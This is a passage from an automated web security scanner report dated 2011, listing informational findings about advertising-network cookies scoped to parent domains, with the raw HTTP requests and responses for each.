a63Z4dXkNgeGLbgjzBot3IZgF_f43q0orUcCB1pzamJnrHZbwDgKuBt10k4qS0Y4XqmheDZzWncGPQ-obDcn4rklvspcF4T1MvNY3wH8WmfBVBADewOhnsTTZcwQ2O_cKWdWHnRHnW0MvCAdVOvB_H5-CgFPTgbTcFOTR_OruXaVmSvxWaotkZUMh8YO2CDHSkuQHNvpYL9IxVdLMAO0ccWwxLTWi1jBMfKHBcBQFeLoPo-o9Ug56BpCRUAZFpmVCXZ3Qd10ruuV1lK6btQ_JxbV8gRwSuoy0wOsY4RyZOeRLXa79L_0UruZ7SQ7nDOH3_UpK9C1uwMA7iZtQ-ABBZnlRLpDLQa3T1jvMzxa6vvkjDgWIUGmyDGPkmTeStGjtZLZBTYqFNU9MJ5YE_zpkKWEn7owTls_2Ri7Iyye7TGUfqeyZ5eFK0Z25wZQKkBI3M6aKCA6vC23uVfJ0RdBdeAtvHyQizZCnixkWx5MfheqiluOQGlg-ItAIsZxzqSPRpmEAmoRmAytNEC5X_1tKtPKPo9q_E6bbLezcAxfHFhLtj9YhI3avFK_HA-CwpQ_ryY3RW2I4cyR91DkfUnGp4CZ2XEUoJZsEQUz1fHuz4KOaEydExDOy-LVKsTbwD47PQ_oY1hwd2q0YscxgOJlsuZESQbJ8HwN9NuhIP_XkX8rtxuP1vl02wF4SENfz2Fj675JocuLm7OAT5SFH2tFhbfFwaSAApIOivosg1964XuUP-GJuvlylYdlQism6wYOEgBb5mpARyrnCVTyHMraYxPOz8XD_c4CB9kh1yXHfva0bF4OdGSzW48YkHeAOVnkOQhtDEIT-1TinU9HRCvu0Gtkelb7fNXObEOkeVNzBQV4WNG7kjfx8tr60k9qg9ATsnYoAeYFeILKS7IQkEsa_85wHumQH0xMx7s4D1jmw4B16C4dfLDNJ-gPuRisqlbSj9DSEz6LzaeaxPegNDw7D2m29-GigZE992_yjCE9D1lgk4BbLcqppQh5sKeMuo2J2dJ0h1G9-2A9WFlHdxjJG9OLWNQkS5uDrWjE8SWU1vESIjDaXQpIM7LHxEoX3lasSLfZcdAUw8CfNlZGPI9gjRxNjfZoV4P_bH3J1EiZLTliURG_QleD_2x9ydRImS05YlERv0IXzbHMdGRmx9f-wRr20Y1tF82xzHRkZsfX_sEa9tGNbanNXcRuj-D2o5vqE4DX4xevSQE3IfLW-l3mLrb1CDRur0kBNyHy1vpd5i629Qg0bq9JATch8tb6XeYutvUING6vSQE3IfLW-l3mLrb1CDRur0kBNyHy1vpd5i629Qg0bs3n6i53yAgbyR6eCHv0eMaIQAic5LsZDONJrUq6wbmYt43Cfg48Vc1r1TQiy_8-cCu5xswhjSp4pbQzt7RFH68NVw7Vie7EmZwU76g-TKghLdyeFMnnM9pFJZdI4m-cLC3cnhTJ5zPaRSWXSOJvnCwt3J4Uyecz2kUll0jib5wsLdyeFMnnM9pFJZdI4m-cLC3cnhTJ5zPaRSWXSOJvnCwt3J4Uyecz2kUll0jib5wsXuVT5JvF1W1aNjuoRaF-mkaxwhgTvGuwVCBlXozift5GscIYE7xrsFQgZV6M4n7eRrHCGBO8a7BUIGVejOJ-3kaxwhgTvGuwVCBlXozift4idoMR_SdzxDZ7G_w0clccS1fjlw50aU0NkdmzBnRWmOAIigblI_jtBLUcZYZrXOPgCIoG5SP47QS1HGWGa1zjl1bauoagZ1M1iCJfLP80Dzy3yIwjhg81IAYzHszNaYX3wDcbsxOHjC1U5u4EiJuIdyIarOzLznCpjY3H8bdib18klrWFfTp2Nb1WaOVWuPLHxJelnxED3MVl_uERX9gK5vLq95iSQ2aeieaQBbTOIuby6veYkkNmnonmkAW0ziLm8ur3mJJDZp6J5pAFtM4i5vLq95iSQ2aeieaQBbTOIlboYXPkW8MWo4rGR69X3pWLxNksW9701Q8uH9_xMEPefznIrlo3WqyPN2D7Ebz9IitcUhJWLMqI_ZYtAMVlGLMrXFISVizKiP2WLQDFZRizK1xSElYsyoj9li0AxWUYsytcUhJWLMqI_ZYtAMVlGLMaPnwPi2iKD7qRkIeSQCAppTiYieerdsyfHnQplwsVNkkPGTOkzPwCUhGIeJybbU25tEjavJfHgFGxLIy_cdxU; fc=mVeMhp7-ld4_XVGY83oSyV3hWUCDbGhmmT9X_UI3cPCqlZbi8OtpyiRwC3bGcdNYqLcvXewLkRbbhMxP5KrQ6js1B_gXcB-qUuts5vF-XAQJlqbR_nvs1sBCEK8H0zsggHYjhoCFjnYm98tOIGVnz9yTqQnfFF8yP7lyDdApkMNbSdeeg1n_QtTgQFvfHLFQT9zwFbWJbyuxwzjlcHRJHBCWkGjVFo180HpWwPYRgVebRjcEB4F4-tbn-dbadQ3U2hGJYNwpXrvgU2zjApqVDS_ZolmR3JdiZaysD2zF72o; pf=KIMUptIal9Nliw08sJTQpzrAikl_fVScFd4qmGyTXES6o4VUW939ncJz_M9dzB62UmrMBVMpgSsIblFazRSHFvyNJGSTFQowtlkWEXspEEWyUA8lyShqTNjLCWmR35lQAe0q7YBFq60qdkok49Ub4icsZdLX4b0PU7FeYXqY03oQHhICh13Elq4vwAwd9rb_XWux54k9t4WxZeFvO_AmtBGWCx2R5xgPC_s5kwxYv523cpL3MMGZNZjM0sSgc3mUjHLQ52r_73tBHOt9AwJrvZSqu2QLfhe55HtMHLH7N4dkI6rwS_FFgauEgoqML85x-1Q3I8oslvAtuyyBsRV6-fzGtf-psK3vfYzM0TUbrRG6q-YPtF8T5YI7kk_i1ZmwdQvGUDdnJ9Q7wqHvVSgCUe7QnJne7ClW0JjJrTY14UTX0rL3iR-kLOOVUOxvehKvsHdHnq4okb07IhP8RrNrcwgNI19g506sy3_lUJPsfl8CGpZK0GFVXeLagp8b1KheELIeEizlDhW6ALtV-GQktuNrQgY57q_B3M-YWTk5qHl07ZpIsC5rrDcwqi2ouvVPptSDGP-GxrCvh-LDjgUd8ZWn7eX_qShrxTbEz_JoQSgkazJjbqogOCGJzp2JwtRxDWW37YD88Oq2q3BJWHMgKp-8bXaWq_ZlUx6tQG9MYgzWnuhICg6DCwbzB8f7O2jIvbxrd5gRo7UNJEp0C8RZD92mAEbpo7VKVZrCc_AFXuEw4VIHl-z6HMGQRzQICMRhyuiZtIpWBYJtFLLA7SWXOYEU1_XIPwT1jfR4VPfRTv6qsLf6D_fnIicUB0pybsIJ2dSqszIzCHMknU-DzVWrNDFM0eGdpjiZO9Ug6jvGBWHuwWjoa3XnE-vhUMqDroQX2i6VQ6o_vJB_s4peYdQHY3PMMUyh2TsgW_znILL-KMVz13JtznmvyeJM_Daav9q-XnC1B7eE2tx0YggEyRGivFBamygjHG5s3uqc4ZO0Su8slXBOHELwL_WMS1ltJh96VLEo5_Rdhy_O_2EbMTxTAB0QzSJLUYL8bvwf_ltWWx49gVG3YRVwjUzsS8cC9tu6PidGJMqmtISA_uBS2GO5emL721cN01WezRNF3l2Jos_32v1JcRdapCworTlW2GnMExs5_u_TEM0IsgE042YcjSnppdr0odeZIIibPByrMIei80W5BDQQmmuXn2BLK2L9VtuwCf0POxmlxjYSO1lO1I6hKPYFh4mC6TZ40m4ac8DKhk2RFegnRLefeZzr8xfHFa7v9HA91JbM5tgynojFu8fmABjZRVBOjbBfTb6Ls-mWBj_6dVFVYBPegaB9ftcm142azN2X6FZLfxHmAJn-TJniBnp3df3A41qYmrDHKEZZ3bqhSTU4dzKj-8nCSiEIK8MjEnLFmwlewonlU5AzOKYGFzmSaC07WQoOi1NX0_sHM7t1P_oDF3ijSQ_b3u4oeJKmVFGrK9unqqF0v5SN3KLim53Jf3v8Px0gg3kgqLE88BFAvW1TPuVrz5YTyJR7pzkVyYP8gQOuOeXedZf-9w; rrs=1%7C2%7C3%7C4%7C5%7C6%7C7%7C10%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7Cundefined%7C12%7Cundefined%7Cundefined%7C1008%7C13%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7C18; rds=15138%7C15138%7C15138%7C15138%7C15138%7C15138%7C15138%7C15110%7C15138%7C15138%7C15138%7C15138%7C15138%7C15138%7Cundefined%7C15138%7Cundefined%7Cundefined%7C15138%7C15138%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7C15138; rv=1

Response

12.34. http://admeld.adnxs.com/usersync previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://admeld.adnxs.com
Path:	/usersync

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

uuid2=3420415245200633085; path=/; expires=Sun, 11-Sep-2011 11:03:14 GMT; domain=.adnxs.com; HttpOnly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /usersync?calltype=admeld&admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_adprovider_id=193&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: admeld.adnxs.com
Proxy-Connection: keep-alive
Referer: http://sportdfw.com/2011/06/13/10-observations-dallas-mavs-finals/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIImdYCEAoYBCAEKAQw0ICz7wQQ0ICz7wQYAw..; anj=Kfw)k>JS.m*cOUs+'x*9/fov!U?-XD/@T`Eo*G>j9p6Kr5j'_7CgzlO:Fvgpkp?4[v=vwq`X_dWeNwpF6L1pOp0@m=r]@w@qmB`wa.gANc?%+]4$8<B8`4]:lCT3*9!qMQcil4XYmQ8WsDzIs#O67VmMmo)bHHWI6ZNYX0a_OT4xLEJYuSASUz$!y`uCnDKOlRBQu-`F+^8q^'[id[S7lqL3SyxsCSr9%@'BHMj:vbN!%A^*8GRvRZzGKBXAg>XGd5%ZV[>#w8#[npwDqVVGb#*ghU%C%7=MVqC2pmBp[Pxux0V[OL(pbe9FyrT[y*nF0xYV^1(9^IA4Y5vQ.63A13Xwt4yzbGW.9sLBw[mW8s6J_PV-8*MjghNoq:MVp!i%g:7B+-LBCkWVYq_!7QJ2ltk?f[Ob[1Nft-Sn1ma>DD[PDURe)51Ox>N/si@JJM]yC]x.!/L]TZ*wZi@6w8U'aoF=ae0W!Uew.vN=.wG!rYe0n(oapLJIa%K^mCY1KfotBEb; sess=1; uuid2=3420415245200633085

Response

12.35. http://admeld.lucidmedia.com/clicksense/admeld/match previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://admeld.lucidmedia.com
Path:	/clicksense/admeld/match

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

2=304YId6UCEb; Domain=.lucidmedia.com; Expires=Tue, 12-Jun-2012 11:21:16 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /clicksense/admeld/match?admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_adprovider_id=73&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: admeld.lucidmedia.com
Proxy-Connection: keep-alive
Referer: http://sportdfw.com/aboutcontact-us/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 2=304YId6UCEb

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-control: no-cache, no-store
P3P: CP=NOI ADM DEV CUR
Pragma: no-cache
Date: Mon, 13 Jun 2011 11:21:15 GMT
Expires: Mon, 13 Jun 2011 11:21:16 GMT
Set-Cookie: 2=304YId6UCEb; Domain=.lucidmedia.com; Expires=Tue, 12-Jun-2012 11:21:16 GMT; Path=/
Content-Type: text/plain
Content-Length: 164
Connection: close

document.write('<img height="0" width="0" style="display: none;" src="http://tag.admeld.com/match?admeld_adprovider_id=73&external_user_id=3460050161923843111"/>');

12.36. http://adopt.imiclk.com/emb/q previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://adopt.imiclk.com
Path:	/emb/q

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

AD2=3,1575606,3,3177098,162,CPM,5DtwX; domain=.imiclk.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /emb/q?size=160x600&m=3&l=1575606&c=162 HTTP/1.1
Host: adopt.imiclk.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?AAAAAG5NDABbfDsAAAAAAFbVDwAAAAAAAgAAAAoAAAAAAP8AAAACB7YKGAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD4ZAYAAAAAAAIAAQAAAAAA7FG4HoXr-T.sUbgehev5PwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADj2zl69I-Cp9kMtWtge5DYqRCnjMrzCXUcicpAAAAAA==,,http%3A%2F%2Fsportdfw.com%2F2011%2F06%2F13%2F10-observations-dallas-mavs-finals%2F,B%3D10%26Z%3D160x600%26_salt%3D1199747959%26r%3D0%26s%3D806254,b7f8d118-95ac-11e0-934f-d33941452b63
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CH=32766,00000,18654,53bro,18661,53bro,24785,53c27,24783,53c27,18653,53bro,33114,00000,32619,00000,38066,00000,19029,58T8w,32620,00000,24775,00000,22244,53br0,28363,53br0,19037,58T8w,24782,53c27,32680,00000,19036,58T8w; RQ=3151,57rv5,3173,53c1h,3190,53c1h,3238,53bro,3677,53bro,3678,53c1h,985,53bro,1445,53bro,1470,53c1h,1478,53bro,1513,53bro,1514,53bro,1515,53bro,2398,53bro,2570,53c1h,1267,53br0,2831,53br0,2848,53br0,2849,53br0,2852,53br0,2850,53br0,2888,53br2,2890,53br0,2921,53br0,2887,53br0,3468,53br2,1042,58T8w,1182,58T8w,1271,58T8w,1273,58T8w,1286,58T8w,1339,58T8w,1909,58T8w,1211,58T8w,3425,58T8w,3387,53br2,3388,53brH,3389,53brJ,3390,53c1h,3391,53c27; YU=9fa0ce56cf0a7fccfc9f70009fb45375-58T8w

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 252
X-ADS-SRC: 6455
Date: Mon, 13 Jun 2011 11:03:13 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: AD2=3,1575606,3,3177098,162,CPM,5DtwX; domain=.imiclk.com; path=/
P3P: CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"

<SCRIPT TYPE="text/javascript" SRC="http://ad.yieldmanager.com/st?ad_type=ad&ad_size
...[SNIP]...

12.37. http://ads.adbrite.com/adserver/vdi/742697 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.adbrite.com
Path:	/adserver/vdi/742697

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rb2=Ch0KBjcxMjE1Nhij2_fAGiINMXZvb2Z5NmEwdGsxdwojCgY3NDI2OTcYpdmj7BkiEzQzMjU4OTcyODk4MzY0ODE4MzAKNAoGODA2MjA1GOihjekdIiQ5ZWQzZjJmMi03ZjVhLTExZTAtYTA3YS0wMDI1OTAwOWE5ZTQQAQ; path=/; domain=.adbrite.com; expires=Sun, 11-Sep-2011 11:12:43 GMT
ut="1%3AVZDLkoMgEEX%2FhbULQGU0f6OiQWMjDxOiIf8%2B2qRSM9tT9%2FStvi%2Fy4OTyIrd%2BC4uTnlyIvU%2Bhjsx3JbSRRZp5ZmsRmQvQOwTWyh2ORGGYQeDCDCsm7kNK1MuzOkArpyUl9NBtCGb%2BVeypaJanlgo2eYDG5AkY362n4q7rDUGnZjFuotAHnFXVfLUGNRrS4d3ZQ%2FP0R%2BiPpqqrpcqcbeNe%2FoPLX%2Bggt3A2KuCxiH7IfGkWjIC2qU5MEx4CxT%2F9gwAEdXrdD3YuEcg0js%2FpE%2BfTHB8jGWkbrXs34tzk%2Ff4F"; path=/; domain=.adbrite.com; expires=Thu, 10-Jun-2021 11:12:43 GMT
vsd=0@2@4df5f0ab@cdn.turn.com; path=/; domain=.adbrite.com; expires=Wed, 15-Jun-2011 11:12:43 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/vdi/742697?d=4325897289836481830 HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=4325897289836481830&mktid=12&mpid=-1&fpid=-1&rnd=8520899083593882395&nu=n&sp=n&ctid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362027x0.066+1305478400x1093175211"; cv="1%3Aq1ZyLi0uyc91zUtWslLKMM%2B1rEnPKzHNt0wsqTG2MixKzSgxsDK0MlCqBQA%3D"; rb=0:684339:20838240:110:0:712156:20861280:1voofy6a0tk1w:0:712181:20838240:WH9qYld2QnJADW1dBwV4VAZUaXsQdQJCDV9iX1pP:0:742697:20828160:4325897289836481830:0:753292:20858400:AG-00000001389358554:0:806205:20882880:9ed3f2f2-7f5a-11e0-a07a-00259009a9e4:0; rb2=Ch0KBjcxMjE1Nhij2_fAGiINMXZvb2Z5NmEwdGsxdwo4CgY3MTIxODEY5Lqa4BYiKFdIOXFZbGQyUW5KQURXMWRCd1Y0VkFaVWFYc1FkUUpDRFY5aVgxcFAKIwoGNzQyNjk3GOilqtsWIhM0MzI1ODk3Mjg5ODM2NDgxODMwCiQKBjc1MzI5MhjXvfa6FyIUQUctMDAwMDAwMDEzODkzNTg1NTQKNAoGODA2MjA1GOihjekdIiQ5ZWQzZjJmMi03ZjVhLTExZTAtYTA3YS0wMDI1OTAwOWE5ZTQQAQ; ut="1%3AVZDLkoMgEEX%2FhbULQGU0f6OiQWMjDxOiIf8%2B2qRSM9tT9%2FStvi%2Fy4OTyIrd%2BC4uTnlyIvU%2Bhjsx3JbSRRZp5ZmsRmQvQOwTWyh2ORGGYQeDCDCsm7kNK1MuzOkArpyUl9NBtCGb%2BVeypaJanlgo2eYDG5AkY362n4q7rDUGnZjFuotAHnFXVfLUGNRrS4d3ZQ%2FP0R%2BiPpqqrpcqcbeNe%2FoPLX%2Bggt3A2KuCxiH7IfGkWjIC2qU5MEx4CxT%2F9gwAEdXrdD3YuEcg0js%2FpE%2BfTHB8jGWkbrXs34tzk%2Ff4F"

Response

HTTP/1.1 200 OK
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Mon, 13 Jun 2011 11:12:43 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: XPEHb/1.0
Set-Cookie: rb2=Ch0KBjcxMjE1Nhij2_fAGiINMXZvb2Z5NmEwdGsxdwojCgY3NDI2OTcYpdmj7BkiEzQzMjU4OTcyODk4MzY0ODE4MzAKNAoGODA2MjA1GOihjekdIiQ5ZWQzZjJmMi03ZjVhLTExZTAtYTA3YS0wMDI1OTAwOWE5ZTQQAQ; path=/; domain=.adbrite.com; expires=Sun, 11-Sep-2011 11:12:43 GMT
Set-Cookie: ut="1%3AVZDLkoMgEEX%2FhbULQGU0f6OiQWMjDxOiIf8%2B2qRSM9tT9%2FStvi%2Fy4OTyIrd%2BC4uTnlyIvU%2Bhjsx3JbSRRZp5ZmsRmQvQOwTWyh2ORGGYQeDCDCsm7kNK1MuzOkArpyUl9NBtCGb%2BVeypaJanlgo2eYDG5AkY362n4q7rDUGnZjFuotAHnFXVfLUGNRrS4d3ZQ%2FP0R%2BiPpqqrpcqcbeNe%2FoPLX%2Bggt3A2KuCxiH7IfGkWjIC2qU5MEx4CxT%2F9gwAEdXrdD3YuEcg0js%2FpE%2BfTHB8jGWkbrXs34tzk%2Ff4F"; path=/; domain=.adbrite.com; expires=Thu, 10-Jun-2021 11:12:43 GMT
Set-Cookie: vsd=0@2@4df5f0ab@cdn.turn.com; path=/; domain=.adbrite.com; expires=Wed, 15-Jun-2011 11:12:43 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;

12.38. http://ads.revsci.net/adserver/ako previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.revsci.net
Path:	/adserver/ako

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rsiPus_7v5P="MLsXtSMNJjhvJZGoecXcxPALFPJgPeBnRLSIC5seAoMV0MlXC83mglpihGJj4llhxoQ3e1svCK+Nxl8qmHgwn/tk5yhz0s6gMqepbcTRCTVKOXsG3B4jg4jRNKkMEO8YvDy8XQojqVeFKRFF0SA4XwrjqmzDguHf3CyYsChIEd+PvSVJnpZZitSz0giLAQhMw4bcMP/b5clIE0lk3/0/oNfGYUVyhJYTYKNqdC04jLXj6sg+6cttG5YhAKNaCzpytY2MD7XsGaLOIsKygBOypHF39kCZifEKvoW0Eyb0XpTtKUZvtijmrfYu4Y+OLOp9bwC/g+sEvqdQ7YBDQq2A4My2funJ12sn+7tZG4H6XJo0VgWp/utobRa0NDjGHRtx7x97JW3JoToRv6HeinKdm77VZc7/yBIEFc6+zL9U8yBMSC5qVJC6BmiCG3p1SP2y4sHRxAy34q9Ecsje+TSUOlpFyMBjMnUYT9/hOFsuCRe2vIQrZ5MSqhLPFIxTJvTaBW1KsX1pOUiAWYGS9pksSD4scIDCtx1JyUgOXoGvION+/YfK0snXNBYv3KM8jG93xv9oHY1DaVTBZWZUssM+HRZUtOooU4xm712Uv/Fz3qUnKMSbHqOCpozPFi2MM3ygrH5yaW/Wz9IAwinylx9hP5pJbdqGtVjwmvBpPo3f7li7jIYCPkCzf4DFfN4BbrrOaH1z+toDcALcyin2/Q2cxY8iyzWLLJ9h48jZE6PisUhkH3lMEb8B0oggg4PEHMi/kiIvDrK7kWYVD6l0KBiEFiPW8liklgMJWMgzQ5SA5NXW1yezXNgckLfqNAJ0XcoFh7/KBIGgvT3Pw9moJyLBRKBUPnteLPQ5kzQHE3L2yXzjv94K2/wytxjkPcQo3BfhAidL4HSD8p8ufsoo976t1Mi4JZ4LSgrIVdcXnfqmKBCmEhMq27EmYxqXGBw6lV6BGQUGb18jiP8bLSf1Z6X9u8kyvCGssYXxZT5Aroz64zbC/oaSXuwzdkSV2LtW0RQkqRIEf+Y2xMd4xUxPqiA9JeqH7iPQQsD1KNmwPAfeki9x4iJttcZcvV7yiwVBEEc0eNbqloKy1cK1IBKakMsK8MXb+G/idjMKFm8y6mYrfO2jOzDfNLd7yjJHDGgKaKqZ9jhxo2x9wGOP0UD1LujJZmTv3h1Hl9d9CZdKyaiILPu2rwJA7li6Yu2q0yffEFIhCP69U6/zuFt/hP4kb+cUdsL0KrdaqpJJZYF6m7GM6Y4fy5vS94WLytkb+PiS9/NMjNC69jbzzThAKHk04he9cu13oXmuVQJ0ZgL4WoDnrHgd7ttEbIWlAIt39YJlj7Cy/qXncpZo5IyRsA=="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
rsi_us_1000000="pUM1IymnMBYY1A2AKVvIImQRK15PG0ZG8xXiy/jjLaAD3cFM0ipXTUHNBmbDd46t2hFxDCMVaHOYllruChPtX9lmoTB4XTp0MTGlRu7VZ6iPaAiSltSt2n1OgbZyFHS488sOo/WhmpOJJdWIC1K0s80FLO15A2FkUVNzDncLH0dcICW/dcxrzfg7YbyAtEmGLqJjJW1YrsXnMK+8Dhb69Do4jhq6oG41IZqAXDdfUZHNnM88F9wL4iaqAraeydL95l0FPnuO7bNXKn5o5StH+jn+w8XqpWQrG6yeq7rXIJxP4CNtFkTqE5r7kU5vouYl44epaLpLfOq+Kb/sCo+gXcEyYD79pUDOBTdpb5Uh1efWnc1B5EgxmFKfdAKvtDLQ29mkG4JbhtIudkyPO73WA/syaBwDa32I4/prXd+FUBwL1Jw0FxazxyTvN18HOldmtcT4pB3kb6LwczuCpT/ahyrZfTzJ64rl2UDtE7pN8BL3zRkB4rMdQontLuqe7dUprOx7ROmerdYAFdCinwH2eKIE2BOKwyzEgfCVs67btvX7XMw2UZA4nqCGXBqXiZ73rpXk51jkGvYtqqjvy0JT3ELSHVUYsk4dOdiiw9CEcmwldalBOtKuvA72v5XZdzNsCA8wmwhD4SthVu1G8H0be93VnunUNYXBjxDpEsYPMzIcENJPlnhMfhlUhH7A7ED9cdH3GBYv5f5PaBjHG3j0pDTuM+o1gYPyxc6bFXpl55vMMSYqvkp0Cdej0KcVQ1WLoY6TZ/j6CAeQ/PQCPxQcz1D+oT54shoq7Ree+ekhbBl5CnD0F9kvAmAerYc3Ms6ILpvA6xV9PPcS+Nitzn86w83YgY3uqd2MqADtKRrVmJSzqNZmh0x5x0hVAWhvDCA6BQ8JoURZOCjqiH855mK3sqrup8s9L575P6sOCuy0uqcB937sPRkk8WeCl1IEoqw1kq/Ilu2l8ir8L+96BxhzjjJPPIXONJv/yfSSTUueIht95Jv91sOFK+nJGXCTUII2fRJ711dwf9AIOLEAaquHaGPrTWpbOQ0HGtSP7yfNv0XXGDw6ajlb0l+l8bB/mvXv2SILU062vN9JM++YOvmd1hzjtNzhi3UjFJz/IFIgCZBs/BVubNMD9uYYbH6TxxjH+7CdSdlo4qYUX31T6EyVGh01Pxz1+fLgG4rhsPKzVPOXvo3kh/6RpWvM0ajQiSoWnBT5aRMuggA4X8pGS2MZIa+hiIDWj/YvAx1LfX+MgoUN9yvHTPBBw6bSIHKNHg6IgIDZ1cuo2xRfbcsahrLCJLUVylUKNJ1/SIR5UJUrbYWaTldI+BcE61OrZUBx12U2DD79VKGzzuDCa9L37Nah53PjStfRX50kC7FkaKN3VY+yzg9/8KqmKE3sDAPbMDW+EyKUDXqHMGqwMCtQSZ12dEEBu5jvmyS19dxP1JTvnRi0xGBcgfwTwvKoY4i9H3dR+qMN7KKTtNtyA3E0omvuepmPaAullSzXZGTDH70dhHLfWM+MR/VcxVNcs4vflK3QEr/94glwixB8mAR8HTbXIM0pOiIcMuzHzOzyPDvR0j2kSHzYEhjo+gzBKwyojKn5LmUx38X30QJ8HlVJ89wvbdE5kPBDOzM1/YnsetfeVgnrUI83ES6N9UeIBfG0caxdSfg2QNj5SN1Inel3N9oTRHpDrjPcIU4e8nSLjr4NUekYAAtLR/4djBPHM+6YgGS49215SR0yEYUAgbeZySxstQNac2aRaGvSDnSiaV3D"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?activate&csid=D10898 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://idolator.com/ifb/audience-science.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_H07707=82f4957c1a652091&H07707&0&4dfc9b6b&0&&4dd62389&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I07714=82f4957c1a652091&I07714&0&4e047730&0&&4ddc9a7b&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05539=82f4957c1a652091&K05539&0&4e047732&1&10592&4dddf043&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e04773b&0&&4dddd39f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_B08725=82f4957c1a652091&B08725&0&4e047743&0&&4dde0faf&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E05516=82f4957c1a652091&E05516&0&4e047779&0&&4dddf225&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e04da55&4&10004,10009,10016,10017&4ddf3979&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_C07583=82f4957c1a652091&C07583&0&4e065339&0&&4de08ea4&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06543=82f4957c1a652091&A06543&0&4e091f12&0&&4de303e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05540=82f4957c1a652091&K05540&0&4e0bcd60&0&&4de5e0dc&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_L09855=82f4957c1a652091&L09855&0&4e0bd03c&0&&4de5b5e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06546=82f4957c1a652091&A06546&0&4e0d143b&0&&4de6f601&1f1a384c105a2f365a2b2d6af5f27c36; 